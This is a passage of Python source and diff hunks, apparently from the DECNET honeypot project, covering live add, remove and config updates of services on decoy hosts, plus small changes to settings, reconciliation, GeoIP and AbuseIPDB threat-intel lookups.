|
# decnet.network → docker, mirroring the pattern used elsewhere in this file).
|
||||||
|
|
||||||
|
|
||||||
|
async def _fleet_decky_host_uuid(repo: BaseRepository, decky_name: str) -> Optional[str]:
    """Look up the ``host_uuid`` recorded on a fleet decky's shard row.

    Scans ``repo.list_decky_shards()`` and returns the ``host_uuid`` of the
    first row whose ``decky_name`` equals *decky_name*. Returns ``None``
    when no row matches; callers read that as "not on a swarm worker".
    """
    shard_rows = await repo.list_decky_shards()
    first_match = next(
        (row for row in shard_rows if row.get("decky_name") == decky_name),
        None,
    )
    if first_match is None:
        return None
    return first_match.get("host_uuid")
|
||||||
|
|
||||||
|
|
||||||
|
async def _redispatch_fleet_shard(repo: BaseRepository, host_uuid: str) -> None:
    """Push the deckies that belong to *host_uuid* back out to that worker.

    Loads the master's fleet state, narrows the config to the deckies whose
    ``host_uuid`` attribute equals *host_uuid*, and passes the narrowed
    copy to ``dispatch_decnet_config`` (the helper behind
    POST /swarm/deploy, per the original author's note). Logs a warning
    and returns without dispatching when the master has no fleet state or
    no decky for the host.
    """
    from decnet.web.router.swarm.api_deploy_swarm import dispatch_decnet_config

    loaded = _load_state()
    if loaded is None:
        log.warning("redispatch_fleet_shard: no fleet state on master; skipping")
        return

    fleet_config, _ = loaded
    owned_by_host = []
    for candidate in fleet_config.deckies:
        if getattr(candidate, "host_uuid", None) == host_uuid:
            owned_by_host.append(candidate)

    if owned_by_host:
        narrowed = fleet_config.model_copy(update={"deckies": owned_by_host})
        await dispatch_decnet_config(narrowed, repo)
        return

    log.warning(
        "redispatch_fleet_shard: master state has no deckies for host=%s; skipping",
        host_uuid,
    )
|
||||||
|
|
||||||
|
|
||||||
|
async def _resync_agent_topology(repo: BaseRepository, topology_id: str) -> None:
    """Re-push an agent-pinned topology to its worker; no-op otherwise.

    The topology is hydrated first. Nothing happens when it cannot be
    hydrated or when its ``topology.target_host_uuid`` is empty (a unihost
    topology, where the local compose file is authoritative). Otherwise
    the deployer's ``resync_agent_topology`` is awaited.
    """
    from decnet.engine.deployer import resync_agent_topology

    snapshot = await hydrate(repo, topology_id)
    pinned_host = (
        None
        if snapshot is None
        else snapshot.get("topology", {}).get("target_host_uuid")
    )
    if pinned_host:
        await resync_agent_topology(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
|
# Module logger. Defined after the helpers above, which only look it up at
# call time, so the late definition is safe.
log = get_logger("engine.services_live")
|
||||||
|
|
||||||
|
# The two scopes the public API dispatches on: a fleet decky or a decky
# that belongs to a topology (which additionally needs a topology_id).
DeckyKind = Literal["fleet", "topology"]
|
||||||
|
|
||||||
|
|
||||||
|
class ServiceMutationError(ValueError):
    """Base error for service-mutation failures the caller can correct.

    The API layer picks a 4xx status from the concrete subclass; an
    instance of this base class itself is reported as 422.
    """
|
||||||
|
|
||||||
|
|
||||||
|
class ServiceNotFoundError(ServiceMutationError):
    """The requested decky or topology does not exist (reported as 404)."""
|
||||||
|
|
||||||
|
|
||||||
|
class ServiceConflictError(ServiceMutationError):
    """The service is already on, or not on, the decky (reported as 409)."""
|
||||||
|
|
||||||
|
|
||||||
|
def _validate_service_for_per_decky(name: str) -> BaseService:
    """Resolve *name* in the service registry for a per-decky mutation.

    Returns the registered service object.

    Raises:
        ServiceMutationError: *name* is not registered (the registry's
            ``KeyError`` is chained), or the service is marked
            ``fleet_singleton``. Singleton services run once per fleet,
            so a per-decky add/remove is rejected instead of silently
            producing a no-op compose entry.
    """
    try:
        registered = get_service(name)
    except KeyError as exc:
        raise ServiceMutationError(f"unknown service {name!r}") from exc

    if not registered.fleet_singleton:
        return registered
    raise ServiceMutationError(
        f"service {name!r} is fleet_singleton; not addable per-decky"
    )
|
||||||
|
|
||||||
|
|
||||||
|
async def _publish(topic: str, payload: dict[str, Any]) -> None:
    """Best-effort publish of *payload* on *topic*.

    A fresh bus is obtained, connected, used for one publish, and closed.
    Any failure along the way is logged as a warning and swallowed, so a
    bus problem never fails the service mutation that triggered it.

    Once ``connect()`` has succeeded, ``close()`` runs even when
    ``publish()`` raises, so a failed publish does not leave the
    connection open.
    """
    try:
        bus = _get_bus()
        await bus.connect()
        try:
            await bus.publish(topic, payload)
        finally:
            # Release the connection on both the success and failure paths.
            await bus.close()
    except Exception as e:  # noqa: BLE001
        log.warning("services_live bus publish failed topic=%s err=%s", topic, e)
|
||||||
|
|
||||||
|
|
||||||
|
# ---------------------------------------------------------- topology path
|
||||||
|
|
||||||
|
|
||||||
|
async def _topology_decky(
    repo: BaseRepository, topology_id: str, decky_name: str,
) -> dict[str, Any]:
    """Return the hydrated decky row named *decky_name* in *topology_id*.

    A row's name is taken from ``decky_config["name"]`` when that is set,
    falling back to the row's own ``name`` key.

    Raises:
        ServiceNotFoundError: the topology cannot be hydrated, or none of
            its deckies carries that name.
    """
    snapshot = await hydrate(repo, topology_id)
    if snapshot is None:
        raise ServiceNotFoundError(f"topology {topology_id!r} not found")

    for row in snapshot["deckies"]:
        embedded_cfg = row.get("decky_config") or {}
        if (embedded_cfg.get("name") or row.get("name")) == decky_name:
            return row

    raise ServiceNotFoundError(
        f"decky {decky_name!r} is not in topology {topology_id!r}"
    )
|
||||||
|
|
||||||
|
|
||||||
|
async def _rerender_topology_compose(
    repo: BaseRepository, topology_id: str,
) -> Path:
    """Hydrate the topology again and rewrite its compose file.

    Run after the DB row has been updated so the file on disk matches the
    new service set; otherwise a later ``up -d`` would work from the stale
    file and bring a removed service back.

    Returns the compose-file path that was written.

    Raises:
        ServiceNotFoundError: the topology can no longer be hydrated.
    """
    snapshot = await hydrate(repo, topology_id)
    if snapshot is None:  # pragma: no cover — narrow race
        raise ServiceNotFoundError(
            f"topology {topology_id!r} disappeared mid-mutation"
        )
    compose_path = _topology_compose_path(topology_id)
    _write_topology_compose(snapshot, compose_path)
    return compose_path
|
||||||
|
|
||||||
|
|
||||||
|
async def _add_topology_service(
    repo: BaseRepository,
    topology_id: str,
    decky_name: str,
    service_name: str,
    initial_config: dict | None = None,
) -> list[str]:
    """Add *service_name* to a topology decky and bring it up.

    Steps, in order: update the decky row (services list, plus
    ``decky_config.service_config[service_name]`` when *initial_config* is
    truthy), re-render the topology compose file, then either resync the
    worker (agent-pinned topology) or run a targeted compose ``up`` for
    ``<decky>-<service>`` locally.

    Returns the post-mutation services list.

    Raises:
        ServiceNotFoundError: topology or decky not found.
        ServiceConflictError: the service is already on the decky.
    """
    decky = await _topology_decky(repo, topology_id, decky_name)
    already_on = decky.get("services") or []
    if service_name in already_on:
        raise ServiceConflictError(
            f"service {service_name!r} already on decky {decky_name!r}"
        )
    services: list[str] = [*already_on, service_name]

    changes: dict[str, Any] = {"services": services}
    if initial_config:
        # Fold the config in before the compose regen so the very first
        # ``up`` already carries the env — no follow-up apply needed.
        decky_blob = dict(decky.get("decky_config") or {})
        per_service = dict(decky_blob.get("service_config") or {})
        per_service[service_name] = initial_config
        decky_blob["service_config"] = per_service
        changes["decky_config"] = decky_blob
    await repo.update_topology_decky(decky["uuid"], changes)

    compose_path = await _rerender_topology_compose(repo, topology_id)
    if await _topology_is_agent_pinned(repo, topology_id):
        # Nothing to start from the master's local compose; the worker
        # gets the new hydrated blob instead.
        await _resync_agent_topology(repo, topology_id)
        return services

    target = f"{decky_name}-{service_name}"

    def _bring_up() -> None:
        _compose(
            "up", "-d", "--no-deps", "--build", target,
            compose_file=compose_path,
        )

    # Compose runs in a worker thread so the event loop stays responsive.
    await anyio.to_thread.run_sync(_bring_up)
    return services
|
||||||
|
|
||||||
|
|
||||||
|
async def _topology_is_agent_pinned(repo: BaseRepository, topology_id: str) -> bool:
    """Report whether the topology has a non-empty ``target_host_uuid``.

    Returns ``False`` when the topology cannot be hydrated.
    """
    snapshot = await hydrate(repo, topology_id)
    return snapshot is not None and bool(
        snapshot.get("topology", {}).get("target_host_uuid")
    )
|
||||||
|
|
||||||
|
|
||||||
|
async def _remove_topology_service(
    repo: BaseRepository,
    topology_id: str,
    decky_name: str,
    service_name: str,
) -> list[str]:
    """Remove *service_name* from a topology decky.

    For a local (not agent-pinned) topology the ``<decky>-<service>``
    container is stopped and removed first, then the DB row and compose
    file are updated. For an agent-pinned topology the local compose
    commands are skipped and the worker is resynced after persistence.

    Returns the post-mutation services list.

    Raises:
        ServiceNotFoundError: topology or decky not found.
        ServiceConflictError: the service is not on the decky.
    """
    decky = await _topology_decky(repo, topology_id, decky_name)
    current = decky.get("services") or []
    if service_name not in current:
        raise ServiceConflictError(
            f"service {service_name!r} not on decky {decky_name!r}"
        )
    services: list[str] = [name for name in current if name != service_name]

    target = f"{decky_name}-{service_name}"
    compose_path = _topology_compose_path(topology_id)
    agent_pinned = await _topology_is_agent_pinned(repo, topology_id)

    if not agent_pinned:
        # Containers go first: if compose fails midway the DB still lists
        # the service, which leaves the operator a clear state to retry.
        for compose_args in (("stop", target), ("rm", "-f", target)):
            await anyio.to_thread.run_sync(
                lambda argv=compose_args: _compose(*argv, compose_file=compose_path),
            )

    await repo.update_topology_decky(decky["uuid"], {"services": services})
    await _rerender_topology_compose(repo, topology_id)

    if agent_pinned:
        # Per the original author's note, the worker tears the service
        # down when it diffs the incoming blob against its own state.
        await _resync_agent_topology(repo, topology_id)
    return services
|
||||||
|
|
||||||
|
|
||||||
|
# ---------------------------------------------------------- fleet path
|
||||||
|
|
||||||
|
|
||||||
|
def _fleet_state_or_raise() -> tuple[Any, Path]:
    """Return the loaded fleet state, or fail if there is none.

    Raises:
        ServiceMutationError: ``_load_state()`` returned ``None``.
    """
    loaded = _load_state()
    if loaded is not None:
        return loaded
    raise ServiceMutationError(
        "no fleet state on disk — run `decnet up` first"
    )
|
||||||
|
|
||||||
|
|
||||||
|
def _fleet_find_decky(config: Any, decky_name: str) -> Any:
    """Return the first entry of ``config.deckies`` named *decky_name*.

    Raises:
        ServiceNotFoundError: no entry has that ``name``.
    """
    found = next(
        (entry for entry in config.deckies if entry.name == decky_name),
        None,
    )
    if found is None:
        raise ServiceNotFoundError(f"fleet decky {decky_name!r} not found")
    return found
|
||||||
|
|
||||||
|
|
||||||
|
async def _persist_fleet_change(
    repo: BaseRepository, decky: Any, services: list[str], compose_path: Path,
) -> None:
    """Persist a fleet decky mutation to JSON state, the compose file, and the DB row.

    State is loaded again here and the entry matching ``decky.name``
    receives the new *services* list. The reloaded entry is not
    necessarily the same object the caller holds, so any
    ``service_config`` the caller set on *decky* is copied across before
    saving. Without that copy a config stashed by the caller would be
    missing from the saved state, the compose file and the DB row.

    Raises:
        ServiceMutationError: there is no fleet state to load.
        ServiceNotFoundError: ``decky.name`` is not in the loaded state.
    """
    # Same guard the other fleet helpers use, instead of unpacking a
    # possible ``None`` and failing with a TypeError.
    config, _ = _fleet_state_or_raise()
    target = _fleet_find_decky(config, decky.name)
    target.services = services

    pending_service_config = getattr(decky, "service_config", None)
    if target is not decky and pending_service_config is not None:
        target.service_config = pending_service_config

    _save_state(config, compose_path)
    _write_compose(config, compose_path)

    # Mirror to the DB row so DB-only consumers (dashboard, API) see the
    # change without waiting for the reconciler.
    from decnet.web.db.models import LOCAL_HOST_SENTINEL

    await repo.upsert_fleet_decky({
        "host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL,
        "name": decky.name,
        "services": services,
        "decky_config": target.model_dump(mode="json"),
        "decky_ip": decky.ip,
        "state": "running",
    })
|
||||||
|
|
||||||
|
|
||||||
|
async def _add_fleet_service(
    repo: BaseRepository,
    decky_name: str,
    service_name: str,
    initial_config: dict | None = None,
) -> list[str]:
    """Add *service_name* to a fleet decky and bring it up.

    The new services list (and, when *initial_config* is truthy, the
    decky's ``service_config[service_name]``) is persisted first. If the
    decky has a shard with a ``host_uuid`` the host's shard is
    redispatched to its worker; otherwise a targeted compose ``up`` for
    ``<decky>-<service>`` runs locally.

    Returns the post-mutation services list.

    Raises:
        ServiceMutationError: no fleet state on disk.
        ServiceNotFoundError: the decky is not in the fleet state.
        ServiceConflictError: the service is already on the decky.
    """
    config, compose_path = _fleet_state_or_raise()
    decky = _fleet_find_decky(config, decky_name)
    already_on = decky.services or []
    if service_name in already_on:
        raise ServiceConflictError(
            f"service {service_name!r} already on decky {decky_name!r}"
        )
    services: list[str] = [*already_on, service_name]

    if initial_config:
        # Stash the validated cfg on the decky model, as the config-update
        # path does, so persistence can pick it up.
        per_service = dict(getattr(decky, "service_config", None) or {})
        per_service[service_name] = initial_config
        decky.service_config = per_service

    await _persist_fleet_change(repo, decky, services, compose_path)

    swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
    if swarm_host_uuid:
        # The master holds no container for this decky; re-push the
        # host's shard so the worker creates the new service.
        await _redispatch_fleet_shard(repo, swarm_host_uuid)
        return services

    target = f"{decky_name}-{service_name}"

    def _bring_up() -> None:
        _compose(
            "up", "-d", "--no-deps", "--build", target,
            compose_file=compose_path,
        )

    await anyio.to_thread.run_sync(_bring_up)
    return services
|
||||||
|
|
||||||
|
|
||||||
|
async def _remove_fleet_service(
    repo: BaseRepository, decky_name: str, service_name: str,
) -> list[str]:
    """Remove *service_name* from a fleet decky.

    For a local decky the ``<decky>-<service>`` container is stopped and
    removed before the change is persisted. For a decky on a swarm worker
    the local compose commands are skipped and the host's shard is
    redispatched after persistence.

    Returns the post-mutation services list.

    Raises:
        ServiceMutationError: no fleet state on disk.
        ServiceNotFoundError: the decky is not in the fleet state.
        ServiceConflictError: the service is not on the decky.
    """
    config, compose_path = _fleet_state_or_raise()
    decky = _fleet_find_decky(config, decky_name)
    current = decky.services or []
    if service_name not in current:
        raise ServiceConflictError(
            f"service {service_name!r} not on decky {decky_name!r}"
        )
    services: list[str] = [name for name in current if name != service_name]

    target = f"{decky_name}-{service_name}"
    swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)

    if not swarm_host_uuid:
        # Local decky: containers go before persistence so a compose
        # failure leaves a clear state to retry from. A swarm decky is
        # handled by the redispatch below.
        for compose_args in (("stop", target), ("rm", "-f", target)):
            await anyio.to_thread.run_sync(
                lambda argv=compose_args: _compose(*argv, compose_file=compose_path),
            )

    await _persist_fleet_change(repo, decky, services, compose_path)

    if swarm_host_uuid:
        await _redispatch_fleet_shard(repo, swarm_host_uuid)
    return services
|
||||||
|
|
||||||
|
|
||||||
|
# ---------------------------------------------------------- public api
|
||||||
|
|
||||||
|
|
||||||
|
async def add_service(
    repo: BaseRepository,
    *,
    decky_kind: DeckyKind,
    decky_name: str,
    service_name: str,
    topology_id: Optional[str] = None,
    config: dict | None = None,
) -> list[str]:
    """Add *service_name* to a deployed decky.

    The service name is checked against the registry (unknown and
    ``fleet_singleton`` names are rejected) and a truthy ``config`` is
    passed through the service's ``validate_cfg`` before anything is
    written, so a validation failure leaves no side effects. The
    scope-specific helper then persists the change, regenerates the
    compose file and starts ``<decky>-<service>``. Finally
    ``decky.<name>.service.added`` is published on the bus.

    ``config`` has the same dict shape the PUT/POST .../config endpoints
    accept.

    Returns the post-mutation services list.

    Raises:
        ServiceMutationError: invalid service, or ``decky_kind`` is
            ``"topology"`` without a ``topology_id``. The scope helpers
            raise its not-found / conflict subclasses.
    """
    svc = _validate_service_for_per_decky(service_name)
    if config:
        initial_config = svc.validate_cfg(config)
    else:
        initial_config = {}

    if decky_kind == "fleet":
        services = await _add_fleet_service(
            repo, decky_name, service_name,
            initial_config=initial_config,
        )
    elif decky_kind == "topology":
        if not topology_id:
            raise ServiceMutationError(
                "decky_kind=topology requires topology_id",
            )
        services = await _add_topology_service(
            repo, topology_id, decky_name, service_name,
            initial_config=initial_config,
        )
    else:  # pragma: no cover — Literal narrows
        raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")

    event_topic = topics.decky(decky_name, topics.DECKY_SERVICE_ADDED)
    event_payload = {
        "decky_name": decky_name,
        "service_name": service_name,
        "topology_id": topology_id,
        "services": services,
    }
    await _publish(event_topic, event_payload)
    log.info(
        "services_live.add decky=%s topology=%s service=%s",
        decky_name, topology_id, service_name,
    )
    return services
|
||||||
|
|
||||||
|
|
||||||
|
async def update_service_config(
    repo: BaseRepository,
    *,
    decky_kind: DeckyKind,
    decky_name: str,
    service_name: str,
    cfg: dict,
    apply: bool = False,
    topology_id: Optional[str] = None,
) -> dict:
    """Store ``cfg`` as the decky's ``service_config[service_name]``.

    ``cfg`` goes through the service's ``validate_cfg`` before any write,
    so a validation failure leaves no side effects.

    * ``apply=False`` (Save) — only persisted state and the compose file
      change; the running container keeps its old env.
    * ``apply=True`` (Apply) — same persistence, followed by a
      force-recreate of ``<decky>-<service>`` (or a push to the worker)
      so the container picks up the new env. Destructive: in-container
      session state on that service is lost.

    ``decky.<name>`` is then notified on the bus with the
    ``DECKY_SERVICE_CONFIG_CHANGED`` topic.

    Returns the validated cfg.

    Raises:
        ServiceMutationError: invalid service, or ``decky_kind`` is
            ``"topology"`` without a ``topology_id``. The scope helpers
            raise its not-found / conflict subclasses.
    """
    svc = _validate_service_for_per_decky(service_name)
    validated = svc.validate_cfg(cfg)

    if decky_kind == "fleet":
        await _update_fleet_service_config(
            repo, decky_name, service_name, validated, apply=apply,
        )
    elif decky_kind == "topology":
        if not topology_id:
            raise ServiceMutationError(
                "decky_kind=topology requires topology_id",
            )
        await _update_topology_service_config(
            repo, topology_id, decky_name, service_name, validated, apply=apply,
        )
    else:  # pragma: no cover
        raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")

    event_topic = topics.decky(decky_name, topics.DECKY_SERVICE_CONFIG_CHANGED)
    event_payload = {
        "decky_name": decky_name,
        "service_name": service_name,
        "topology_id": topology_id,
        "service_config": validated,
        "recreated": bool(apply),
    }
    await _publish(event_topic, event_payload)
    log.info(
        "services_live.update_config decky=%s topology=%s service=%s apply=%s",
        decky_name, topology_id, service_name, apply,
    )
    return validated
|
||||||
|
|
||||||
|
|
||||||
|
async def _update_topology_service_config(
    repo: BaseRepository,
    topology_id: str,
    decky_name: str,
    service_name: str,
    validated: dict,
    *,
    apply: bool,
) -> None:
    """Write *validated* into a topology decky's service config.

    Updates ``decky_config.service_config[service_name]`` on the decky
    row and re-renders the compose file. With ``apply`` set, the worker is
    resynced (agent-pinned topology) or ``<decky>-<service>`` is
    force-recreated through the local compose file.

    Raises:
        ServiceNotFoundError: topology or decky not found.
        ServiceConflictError: the service is not on the decky.
    """
    decky = await _topology_decky(repo, topology_id, decky_name)
    if service_name not in (decky.get("services") or []):
        raise ServiceConflictError(
            f"service {service_name!r} not on decky {decky_name!r}"
        )

    decky_blob = dict(decky.get("decky_config") or {})
    per_service = dict(decky_blob.get("service_config") or {})
    per_service[service_name] = validated
    decky_blob["service_config"] = per_service
    await repo.update_topology_decky(decky["uuid"], {"decky_config": decky_blob})

    compose_path = await _rerender_topology_compose(repo, topology_id)
    if not apply:
        return

    if await _topology_is_agent_pinned(repo, topology_id):
        await _resync_agent_topology(repo, topology_id)
        return

    target = f"{decky_name}-{service_name}"

    def _recreate() -> None:
        _compose(
            "up", "-d", "--no-deps", "--force-recreate", "--build", target,
            compose_file=compose_path,
        )

    await anyio.to_thread.run_sync(_recreate)
|
||||||
|
|
||||||
|
|
||||||
|
async def _update_fleet_service_config(
    repo: BaseRepository,
    decky_name: str,
    service_name: str,
    validated: dict,
    *,
    apply: bool,
) -> None:
    """Write *validated* into a fleet decky's service config.

    Sets ``service_config[service_name]`` on the decky in the loaded fleet
    state, saves state, rewrites the compose file and upserts the DB row.
    With ``apply`` set, the host's shard is redispatched (swarm decky) or
    ``<decky>-<service>`` is removed by name and force-recreated locally.

    Raises:
        ServiceMutationError: no fleet state on disk.
        ServiceNotFoundError: the decky is not in the fleet state.
        ServiceConflictError: the service is not on the decky.
    """
    config, compose_path = _fleet_state_or_raise()
    decky = _fleet_find_decky(config, decky_name)
    if service_name not in (decky.services or []):
        raise ServiceConflictError(
            f"service {service_name!r} not on decky {decky_name!r}"
        )

    per_service = dict(getattr(decky, "service_config", None) or {})
    per_service[service_name] = validated
    decky.service_config = per_service
    _save_state(config, compose_path)
    _write_compose(config, compose_path)

    from decnet.web.db.models import LOCAL_HOST_SENTINEL

    db_row = {
        "host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL,
        "name": decky.name,
        "services": list(decky.services or []),
        "decky_config": decky.model_dump(mode="json"),
        "decky_ip": decky.ip,
        "state": "running",
    }
    await repo.upsert_fleet_decky(db_row)

    if not apply:
        return

    swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
    if swarm_host_uuid:
        await _redispatch_fleet_shard(repo, swarm_host_uuid)
        return

    target = f"{decky_name}-{service_name}"

    def _drop_stale_container() -> None:
        # Exit status is deliberately ignored: the container may not exist.
        subprocess.run(  # nosec B603 B607
            ["docker", "rm", "-f", target],
            capture_output=True,
        )

    def _recreate() -> None:
        _compose(
            "up", "-d", "--no-deps", "--force-recreate", "--build", target,
            compose_file=compose_path,
        )

    # Compose tracks the previous container by ID. If that container is
    # already gone (or was renamed by an earlier failed deploy),
    # --force-recreate fails with "No such container", so remove it by
    # name first and let Compose start clean.
    await anyio.to_thread.run_sync(_drop_stale_container)
    await anyio.to_thread.run_sync(_recreate)
|
||||||
|
|
||||||
|
|
||||||
|
async def remove_service(
    repo: BaseRepository,
    *,
    decky_kind: DeckyKind,
    decky_name: str,
    service_name: str,
    topology_id: Optional[str] = None,
) -> list[str]:
    """Remove *service_name* from a deployed decky.

    The scope-specific helper stops and removes the service container,
    persists the shortened services list and re-renders the compose file
    so the next ``up -d`` does not bring the service back. Afterwards
    ``decky.<name>.service.removed`` is published on the bus.

    Returns the post-mutation services list.

    Raises:
        ServiceMutationError: ``decky_kind`` is ``"topology"`` without a
            ``topology_id``. The scope helpers raise its not-found /
            conflict subclasses.
    """
    if decky_kind == "fleet":
        services = await _remove_fleet_service(repo, decky_name, service_name)
    elif decky_kind == "topology":
        if not topology_id:
            raise ServiceMutationError(
                "decky_kind=topology requires topology_id",
            )
        services = await _remove_topology_service(
            repo, topology_id, decky_name, service_name,
        )
    else:  # pragma: no cover
        raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")

    event_topic = topics.decky(decky_name, topics.DECKY_SERVICE_REMOVED)
    event_payload = {
        "decky_name": decky_name,
        "service_name": service_name,
        "topology_id": topology_id,
        "services": services,
    }
    await _publish(event_topic, event_payload)
    log.info(
        "services_live.remove decky=%s topology=%s service=%s",
        decky_name, topology_id, service_name,
    )
    return services
|
||||||
@@ -91,7 +91,7 @@ DECNET_API_PORT: int = _port("DECNET_API_PORT", 8000)
|
|||||||
# DECNET_JWT_SECRET is resolved lazily via module __getattr__ so that agent /
|
# DECNET_JWT_SECRET is resolved lazily via module __getattr__ so that agent /
|
||||||
# updater / swarmctl subcommands (which never touch auth) can start without
|
# updater / swarmctl subcommands (which never touch auth) can start without
|
||||||
# the master's JWT secret being present in the environment.
|
# the master's JWT secret being present in the environment.
|
||||||
DECNET_INGEST_LOG_FILE: str | None = os.environ.get("DECNET_INGEST_LOG_FILE", "/var/log/decnet/decnet.log")
|
DECNET_INGEST_LOG_FILE: str = os.environ.get("DECNET_INGEST_LOG_FILE", "/var/log/decnet/decnet.log")
|
||||||
|
|
||||||
# Agent-side RFC 5424 sink written by decnet.collector.worker when run on
|
# Agent-side RFC 5424 sink written by decnet.collector.worker when run on
|
||||||
# a SWARM worker. The forwarder tails this file and ships lines over
|
# a SWARM worker. The forwarder tails this file and ships lines over
|
||||||
@@ -114,6 +114,11 @@ DECNET_SWARM_MASTER_HOST: str | None = os.environ.get("DECNET_SWARM_MASTER_HOST"
|
|||||||
DECNET_HOST_UUID: str | None = os.environ.get("DECNET_HOST_UUID")
|
DECNET_HOST_UUID: str | None = os.environ.get("DECNET_HOST_UUID")
|
||||||
DECNET_MASTER_HOST: str | None = os.environ.get("DECNET_MASTER_HOST")
|
DECNET_MASTER_HOST: str | None = os.environ.get("DECNET_MASTER_HOST")
|
||||||
DECNET_SWARMCTL_PORT: int = _port("DECNET_SWARMCTL_PORT", 8770)
|
DECNET_SWARMCTL_PORT: int = _port("DECNET_SWARMCTL_PORT", 8770)
|
||||||
|
# Bind address for the master-side swarm controller. Loopback by default —
|
||||||
|
# operators flip to 0.0.0.0 (or a specific NIC) on production masters where
|
||||||
|
# workers heartbeat in over mTLS from other hosts. Seeded by [swarm]
|
||||||
|
# swarmctl-host in /etc/decnet/decnet.ini.
|
||||||
|
DECNET_SWARMCTL_HOST: str = os.environ.get("DECNET_SWARMCTL_HOST", "127.0.0.1")
|
||||||
|
|
||||||
# Ingester batching: how many log rows to accumulate per commit, and the
|
# Ingester batching: how many log rows to accumulate per commit, and the
|
||||||
# max wait (ms) before flushing a partial batch. Larger batches reduce
|
# max wait (ms) before flushing a partial batch. Larger batches reduce
|
||||||
|
|||||||
@@ -128,8 +128,6 @@ async def reconcile_once(
|
|||||||
container_states = await asyncio.to_thread(
|
container_states = await asyncio.to_thread(
|
||||||
_collect_container_states, docker_client_factory,
|
_collect_container_states, docker_client_factory,
|
||||||
)
|
)
|
||||||
docker_known = container_states is not None
|
|
||||||
|
|
||||||
json_names = {d.name for d in json_deckies}
|
json_names = {d.name for d in json_deckies}
|
||||||
|
|
||||||
# 1. INSERT: present in JSON, absent from DB.
|
# 1. INSERT: present in JSON, absent from DB.
|
||||||
@@ -138,7 +136,7 @@ async def reconcile_once(
|
|||||||
continue
|
continue
|
||||||
new_state = (
|
new_state = (
|
||||||
_aggregate_decky_state(d.name, list(d.services), container_states)
|
_aggregate_decky_state(d.name, list(d.services), container_states)
|
||||||
if docker_known else "running"
|
if container_states is not None else "running"
|
||||||
)
|
)
|
||||||
row_host = d.host_uuid or host_uuid
|
row_host = d.host_uuid or host_uuid
|
||||||
await repo.upsert_fleet_decky({
|
await repo.upsert_fleet_decky({
|
||||||
@@ -168,7 +166,7 @@ async def reconcile_once(
|
|||||||
)
|
)
|
||||||
|
|
||||||
# 3. STATE: present in both, docker says something fresh.
|
# 3. STATE: present in both, docker says something fresh.
|
||||||
if docker_known:
|
if container_states is not None:
|
||||||
for d in json_deckies:
|
for d in json_deckies:
|
||||||
existing = db_by_name.get(d.name)
|
existing = db_by_name.get(d.name)
|
||||||
if existing is None:
|
if existing is None:
|
||||||
|
|||||||
@@ -9,7 +9,7 @@ from decnet.geoip.base import Provider
|
|||||||
from decnet.geoip.lookup import Lookup
|
from decnet.geoip.lookup import Lookup
|
||||||
from decnet.geoip.paths import ensure_root
|
from decnet.geoip.paths import ensure_root
|
||||||
from decnet.geoip.rir.fetch import RIR_SOURCES, fetch_all
|
from decnet.geoip.rir.fetch import RIR_SOURCES, fetch_all
|
||||||
from decnet.geoip.rir.parse import parse_file
|
from decnet.geoip.rir.parse import Range, parse_file
|
||||||
|
|
||||||
logger = logging.getLogger("decnet.geoip.rir.provider")
|
logger = logging.getLogger("decnet.geoip.rir.provider")
|
||||||
|
|
||||||
@@ -45,7 +45,7 @@ class RirProvider(Provider):
|
|||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
logger.warning("geoip.rir: cache load failed, rebuilding: %s", exc)
|
logger.warning("geoip.rir: cache load failed, rebuilding: %s", exc)
|
||||||
|
|
||||||
ranges = []
|
ranges: list[Range] = []
|
||||||
for path in self.data_paths():
|
for path in self.data_paths():
|
||||||
if not path.exists():
|
if not path.exists():
|
||||||
continue
|
continue
|
||||||
|
|||||||
@@ -17,7 +17,6 @@ later if operators report drift.
|
|||||||
"""
|
"""
|
||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
import json
|
|
||||||
import os
|
import os
|
||||||
from datetime import datetime, timezone
|
from datetime import datetime, timezone
|
||||||
from typing import Optional
|
from typing import Optional
|
||||||
@@ -93,12 +92,25 @@ class AbuseIPDBProvider(IntelProvider):
|
|||||||
data = payload.get("data") or {}
|
data = payload.get("data") or {}
|
||||||
score = int(data.get("abuseConfidenceScore") or 0)
|
score = int(data.get("abuseConfidenceScore") or 0)
|
||||||
verdict = _score_to_verdict(score)
|
verdict = _score_to_verdict(score)
|
||||||
|
# AbuseIPDB returns ``data.reports[*].categories`` — a list of
|
||||||
|
# int codes per report. Flatten the union across all recent
|
||||||
|
# reports so the IntelLifter sees the full activity profile,
|
||||||
|
# not just the most-recent report's categories. Sorted for
|
||||||
|
# determinism (matters for tests + for the bus payload diff).
|
||||||
|
categories: set[int] = set()
|
||||||
|
for report in data.get("reports") or []:
|
||||||
|
if not isinstance(report, dict):
|
||||||
|
continue
|
||||||
|
for cat in report.get("categories") or []:
|
||||||
|
if isinstance(cat, int):
|
||||||
|
categories.add(cat)
|
||||||
return IntelResult(
|
return IntelResult(
|
||||||
provider=self.name,
|
provider=self.name,
|
||||||
verdict=verdict,
|
verdict=verdict,
|
||||||
column_updates={
|
column_updates={
|
||||||
"abuseipdb_score": score,
|
"abuseipdb_score": score,
|
||||||
"abuseipdb_raw": json.dumps(data),
|
"abuseipdb_categories": sorted(categories),
|
||||||
|
"abuseipdb_raw": data,
|
||||||
"abuseipdb_queried_at": datetime.now(timezone.utc),
|
"abuseipdb_queried_at": datetime.now(timezone.utc),
|
||||||
},
|
},
|
||||||
)
|
)
|
||||||
|
|||||||
@@ -78,3 +78,33 @@ class IntelProvider(ABC):
|
|||||||
entire IP. Implementations should also respect
|
entire IP. Implementations should also respect
|
||||||
``self._semaphore`` to bound in-flight calls.
|
``self._semaphore`` to bound in-flight calls.
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
||||||
|
class MalHashProvider(ABC):
    """Interface for providers that answer "is this file hash known-bad?".

    Deliberately separate from :class:`IntelProvider`: this contract is
    keyed on a file SHA-256 rather than an IP, and its consumer is the
    email ingester at observation time rather than the IP-keyed
    intel-worker fan-out. Keeping two ABCs lets ``lookup(ip)`` on
